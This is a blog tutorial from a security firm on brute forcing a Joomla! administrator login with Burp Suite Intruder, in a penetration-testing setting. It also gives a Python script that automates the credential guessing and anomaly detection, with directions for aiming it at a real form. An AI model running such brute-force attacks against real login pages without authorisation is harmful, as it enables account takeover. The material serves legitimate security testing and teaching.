The purpose of this blog is to demonstrate how to brute force a login page using Burp Suite. There are other brute force tools such as Hydra and Ncrack. Although both are great tools, Burp Suite is better suited to brute forcing a web application login page, because you can see and tune the exact HTTP request and compare every response, whereas Hydra and Ncrack are better suited to network services such as SSH and RDP.
Setting Burp Suite as a Web Proxy
Burp is designed to be used alongside your browser. Burp functions as an HTTP proxy server, and all HTTP/S traffic from your browser passes through Burp. To ensure that Burp's proxy listener is running, go to the Proxy tab and make sure that the intercept button reads Intercept is on, as shown below.
Now, you need to configure your browser to use Burp's proxy listener as its HTTP proxy server. By default the listener binds to 127.0.0.1 on port 8080, so change your browser's proxy settings to use that host and port for both HTTP and HTTPS. Firefox is the default browser in Kali, so open Firefox and go to Preferences. Click on Advanced, select the Network tab, and click on Settings, as shown below (the exact menu path differs between Firefox versions, but the proxy settings are always under the network section).
Select the Manual proxy configuration radio button. Enter 127.0.0.1 in the HTTP Proxy field and enter 8080 in the Port field. Make sure the Use this proxy server for all protocols box is checked. Delete anything that is in the No proxy for field, otherwise requests to those hosts will bypass Burp. Save the settings.
Now, if everything is configured properly, all your HTTP/S traffic should go through Burp. For HTTPS sites you also need to install Burp's CA certificate in Firefox (with the proxy configured, browse to http://burp and download it), otherwise the browser will reject the certificate Burp generates for each site. Whenever you visit a website, the Proxy tab in Burp will change its color to orange and Burp will hold the request until you decide what to do with it. At this point, you can turn off the intercept and only turn it on when you need it.
How to Brute Force Login Pages
Let's say you are performing a penetration test against your client's website and you come across a Joomla! administrator interface. If you can brute force the admin account, you will have total control over the website. Before you start, confirm with the client that the account can take a large number of failed logins: a brute force attack may trigger an account lockout or an IP block, which can lock the legitimate administrator out as well. To brute force the login page, open Burp and make sure Burp's intercept is on.
In this demonstration, we will brute force both the username and password. I've made my own username list because I am certain that the username would be one of these three: root, administrator, or admin. Also, there are numerous username/password lists in the /usr/share/wordlists directory on Kali. For this demonstration, I've used the top 500 passwords from the rockyou list.
Once you have your username and password lists ready, type anything in the username and password fields; in my case I used canary/canary1. Your HTTP request will be captured by Burp and will wait for your action. You will be able to see what you put for the username and password, as shown below. Right click and send the request to Intruder. Drop the request and turn off the intercept.
Click on the Intruder tab and go to the Positions tab, as shown below. Make sure the Attack type is set to Cluster bomb, which tries every username against every password (if you already know the username and only want to brute force the password, select Sniper, which varies a single position). Burp automatically marks every position where a payload can be inserted, including cookies and tokens we do not want to change. We are only interested in the username and passwd parameters, so click Clear § to remove the automatic markers, highlight canary and click Add §, then do the same for canary1.
Go to the Payloads tab and click the Payload set drop down menu. You can see that there are 2 payload sets: set 1 is the first marked position (username) and set 2 is the second (password). Choose 1 and load the username list by clicking on Load. Do the same thing for the password list after you select 2 in the Payload set. With 3 usernames and 500 passwords, Cluster bomb will send 1,500 requests. Now, launch the brute force attack by clicking on Start attack at the top right corner. Note that Intruder is heavily rate-limited in Burp Suite Community Edition, so a run of this size takes much longer there than in the Professional edition.
While Burp is brute forcing the login page, check for any anomalies in the responses. A failed login normally produces the same status code and roughly the same response length every time, so a successful login stands out: sort the results by the Status or Length column, or use the Grep - Match option to flag responses that do not contain the failure message. Going through the requests, I noticed that the status for request 78 is 301. All the other requests came back with a 200, displaying "Username and password do not match." Using the username and password from request 78 (admin/sunshine), I was able to get in to the administrator interface!
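To make the mechanics of the attack concrete, here is an added Python example (not code from the original post and not Burp's own code) that does what Intruder did above: it generates the Cluster bomb and Sniper payload combinations, sends each pair to a login function, and flags the responses whose status or length deviate from the baseline, or that lack the failure message. The target is a constructed stand-in for the Joomla! login handler, `fake_joomla_login`, that only mimics the behaviour described in the post (200 with "Username and password do not match" on failure, a 301 on success); the valid credential pair it accepts is an assumption for the demonstration, and the `load_wordlist` helper and its `limit` argument are assumptions too.

```python
import itertools
from collections import Counter

FAILURE_MARKER = "Username and password do not match"

# Constructed stand-in for the Joomla! administrator login handler. It is
# NOT the real target: it only reproduces the observable behaviour from the
# post. The accepted pair is an assumption made for this demo.
VALID_CREDENTIALS = {("admin", "sunshine")}


def fake_joomla_login(username, password):
    """Return (status_code, body) the way the login form did in the post."""
    if (username, password) in VALID_CREDENTIALS:
        # Successful login: redirect into the administrator interface.
        return 301, ""
    # Failed login: same page again, with the error message in the HTML.
    return 200, "<html><body>" + FAILURE_MARKER + "</body></html>"


def load_wordlist(path, limit=None):
    """Read a wordlist (e.g. the first 500 lines of rockyou.txt) into a list."""
    with open(path, encoding="utf-8", errors="ignore") as fh:
        words = [line.rstrip("\n") for line in fh]
    return words[:limit] if limit else words


def cluster_bomb(usernames, passwords):
    """Every username against every password: len(users) * len(pws) pairs."""
    return itertools.product(usernames, passwords)


def sniper(username, passwords):
    """One fixed username; only the password position varies."""
    return ((username, pw) for pw in passwords)


def run_attack(pairs, send):
    """Send each pair and record what Intruder shows per row: status, length, body."""
    results = []
    for number, (user, pw) in enumerate(pairs, start=1):
        status, body = send(user, pw)
        results.append({
            "request": number,
            "username": user,
            "password": pw,
            "status": status,
            "length": len(body),
            "body": body,
        })
    return results


def find_anomalies(results, failure_marker=FAILURE_MARKER):
    """Flag rows that differ from the most common (status, length) pair, or
    whose body does not contain the failure message (Grep - Match)."""
    if not results:
        return []
    baseline = Counter((r["status"], r["length"]) for r in results).most_common(1)[0][0]
    return [
        r for r in results
        if (r["status"], r["length"]) != baseline or failure_marker not in r["body"]
    ]


if __name__ == "__main__":
    # Constructed sample lists standing in for the author's three usernames
    # and the top-N passwords from rockyou.
    users = ["root", "administrator", "admin"]
    pws = ["123456", "password", "sunshine", "princess"]
    hits = find_anomalies(run_attack(cluster_bomb(users, pws), fake_joomla_login))
    for hit in hits:
        print(hit["request"], hit["status"], hit["username"], hit["password"])
```

To use it against a real form, replace `fake_joomla_login` with a function that POSTs the `username` and `passwd` fields (plus whatever cookie or token the form requires) and returns the status code and body; routing those requests through Burp's listener at 127.0.0.1:8080 lets you inspect them in the Proxy history. Comparing against the most common (status, length) pair rather than a fixed value is what keeps the check working when the failure page changes size between targets, but a lockout that starts part way through will shift the baseline, which is another reason to watch for lockouts before starting.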
There are many ways to brute force a login page and using Burp Suite is one of them. To learn more about password cracking, read our previous blogs: Online Password Cracking: The Attack and the Best Defense Against It and Offline Password Cracking: The Attack and the Best Defense Against It.
Joseph Choi is a Cybersecurity Analyst with Alpine Security. He holds several security-related certifications, including EC-Council Certified Security Analyst (ECSA), CyberSec First Responder (CFR), Security+, and Network+. Joseph is a recent graduate from Truman State University with a B.S. in Business Administration. Joseph's cybersecurity experience began at Alpine and includes penetration tests, vulnerability assessments, and wireless penetration tests. He was born and raised in South Korea until the age of 10 when he moved to Mexico. It wasn't until 2007 that his family moved to the States where he completed his high school and college education. He is a fan of Mr. Robot, and in his spare time he enjoys spending time with his girlfriend, taking long walks around the park, and going to the gym.